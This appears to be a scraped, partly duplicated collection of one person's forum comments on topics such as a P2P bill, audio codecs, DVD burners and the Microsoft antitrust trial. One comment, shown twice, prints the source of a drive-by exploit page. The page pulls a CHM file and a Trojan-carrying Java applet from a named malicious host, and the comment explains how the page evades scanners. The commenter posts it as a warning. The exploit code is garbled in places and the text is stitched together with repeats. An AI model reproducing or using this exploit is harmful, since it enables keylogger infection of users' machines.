I found this page yesterday, it is an exploit of this vulnerability.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SERVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here. http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
This loads and runs the x.chm file from http://hard-virgins.com/sher/x.chm
and also the loader.jar file from http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for ansering my question/.
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) than norton will stop these exploits from running and delete them, but they still get on your system just fine.
Figure six-nine months till they double the speed, so roughly a 23 minute burn, and then i'll have to buy one. I, and many people i know, have been waiting to buy a burner until such time as i could make a single disc backup of a full length dvd.
They say they aren't reporting your information to the police, "even though [they] should be." Should be for what? Downloading your dustbunny program? Is that illegal now because you seem to be purposefully giving it away.
I am actually on the Dish networks side on this one; what Viacom is trying to with their crappy channel bundling is a joke. That said however, CBS has CSI and Survivor, for most people $1/month is nowhere near good enough.
I'm sure it's true that the plain old cell phones are dying away; have you tried to buy a "plain" cell phone lately? It's very difficult, almost all of them have color screens, cameras, et al.
Combine that with the fact that most cell phones break after a few years, and so need to be replaced by these new fancy ones, and the new ones "dominate."
"(4) Approximately 40 percent of users of peer-to-peer systems are juveniles." - And whose ass exactly did they pull that stat from?
"Peer-to-peer systems also pose serious security and privacy threats to users." - As if this bill doesn't pose 100x more of a threat.
"Among other things, peer-to-peer software often gives others access to all the files that are stored on a user's hard drive, and many users, including juvenile users and their parents, do not even know of these threats." - Only if it has bug (which any program could, most noticebly WINDOWS), or you ignore everything it tells you and you set it up completely wrong, which is your own fault.
"MIT prof Stuart Madnick, testifying on MS's behalf, was caught out twice when a government attorney asked him to name an OS (other than one made by Microsoft) where the browser couldn't be removed. Madnick also faltered on several other questions."
What does that question have to do with ANYTHING? He was there to testify as to how hard it would be to remove IE from windows, not to discuss browser integration in other platforms. He said it would be hard to do in windows, how does the fact that it would be easy to do in linux have ANY relevance about what he said?
Prof: "40^2 = 1600" Lawyer: "Ok, well can you think of any numbers that when squared don't equal 1600?" Prof: "Well yes . . . " Lawyer: "Ahh ha!"
Wow how sweet is that, that's where i go anyway, it's like 5 minutes from my house. Course i'll probly never notice the difference, but hey, always up for something new.
My problem with Ogg is sound quality. Now don't get me wrong, i'm not saying it's worse than mp3, but i don't think it's any better (i know there are "expert" polls that say otherwise, but i've also seen "expert" polls that agree as well). Either way however, it doesn't sound as good as mp3pro (imo, and i'm something of an expert myself), and the files are larger! I realize Ogg is much more widespread than mp3pro, but i doubt that will last long.
I do understand that there are situations where you need a "free" codec; and in that case i say go Ogg. But, for the rest of the time, i say go mp3pro!
Slashdot Mirror
Which i learned about right here of course.
e nt /
http://www.stud.uni-karlsruhe.de/~unk6/translux
I found this page yesterday, it is an exploit of this vulnerability.
; s-its:mhtml:file://c:\\nosuch.mht!http://hard-virg ins.com/sher/x.chm::/x.htm'));t width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
/.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SERVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here.
http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'m
</script>
<apple
</body></html>
This loads and runs the x.chm file from
http://hard-virgins.com/sher/x.chm
and also the loader.jar file from
http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for ansering my question
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) than norton will stop these exploits from running and delete them, but they still get on your system just fine.
So careful out there, this exploit is dangerous.
Let me rephrase, a full quality single disc backup.
Xvid is great and all, but it is noticably different than the regular DVD quality.
I didn't pay for a kickass TV to watch mediocre quality copies.
Figure six-nine months till they double the speed, so roughly a 23 minute burn, and then i'll have to buy one. I, and many people i know, have been waiting to buy a burner until such time as i could make a single disc backup of a full length dvd.
The time is now, apparently.
The pumping will be done for you.
And here i am doing my own pumping like a sucker.
They say they aren't reporting your information to the police, "even though [they] should be." Should be for what? Downloading your dustbunny program? Is that illegal now because you seem to be purposefully giving it away.
What would these tools be telling the cops?
"These people downloaded our program."
"Is your program copyrighted?"
"Umm, no, but it is mislabeled!"
Morons.
I am actually on the Dish networks side on this one; what Viacom is trying to with their crappy channel bundling is a joke. That said however, CBS has CSI and Survivor, for most people $1/month is nowhere near good enough.
They are essentially trying to blackmail the Dish network into taking a crappy network they don't want that is way overpriced. Screw them.
I'm sure it's true that the plain old cell phones are dying away; have you tried to buy a "plain" cell phone lately? It's very difficult, almost all of them have color screens, cameras, et al.
Combine that with the fact that most cell phones break after a few years, and so need to be replaced by these new fancy ones, and the new ones "dominate."
I never really liked any of the Duke games.
I found this little quote interesting . . .
Custom kernel building was not performed since most customers would not be willing or able to perform or support such a customized environment.
Mandrake is good stuff, and getting better every release. Kudos!
. . . for the new Anthony Hamilton CD is because he's goddamn horrible.
From the bill:
"(4) Approximately 40 percent of users of peer-to-peer systems are juveniles." - And whose ass exactly did they pull that stat from?
"Peer-to-peer systems also pose serious security and privacy threats to users." - As if this bill doesn't pose 100x more of a threat.
"Among other things, peer-to-peer software often gives others access to all the files that are stored on a user's hard drive, and many users, including juvenile users and their parents, do not even know of these threats." - Only if it has bug (which any program could, most noticebly WINDOWS), or you ignore everything it tells you and you set it up completely wrong, which is your own fault.
I bet it still gets the weather wrong.
Umm, auto-tuners have been around for a very long time, this is old news.
Where are the machines they used for LOTR:TT? Are the special effect demands going to be so much greater that they need this monster?
Would you miss it? really?
When 2.4.18 came out, i thought to myself "well i'll just wait till 2.4.19 comes out to switch to 2.4, shouldn't be more than a month or so."
Since then i've had to renew my drivers license three times.
Longest . . . update . . . ever!
It's my opinion, i don't need lab results. I'm just stating my opinion.
Speaking as an audiophile and an audio engineer, and strictly referring to sound quality: mp3pro is better.
"MIT prof Stuart Madnick, testifying on MS's behalf, was caught out twice when a government attorney asked him to name an OS (other than one made by Microsoft) where the browser couldn't be removed. Madnick also faltered on several other questions."
What does that question have to do with ANYTHING? He was there to testify as to how hard it would be to remove IE from windows, not to discuss browser integration in other platforms. He said it would be hard to do in windows, how does the fact that it would be easy to do in linux have ANY relevance about what he said?
Prof: "40^2 = 1600"
Lawyer: "Ok, well can you think of any numbers that when squared don't equal 1600?"
Prof: "Well yes . . . "
Lawyer: "Ahh ha!"
Wow how sweet is that, that's where i go anyway, it's like 5 minutes from my house. Course i'll probly never notice the difference, but hey, always up for something new.
My problem with Ogg is sound quality. Now don't get me wrong, i'm not saying it's worse than mp3, but i don't think it's any better (i know there are "expert" polls that say otherwise, but i've also seen "expert" polls that agree as well). Either way however, it doesn't sound as good as mp3pro (imo, and i'm something of an expert myself), and the files are larger! I realize Ogg is much more widespread than mp3pro, but i doubt that will last long.
I do understand that there are situations where you need a "free" codec; and in that case i say go Ogg. But, for the rest of the time, i say go mp3pro!
Anyone remember the original Video Blaster from like 1992? Full screen video in windows 3.11, too bad it didn't really do anything else.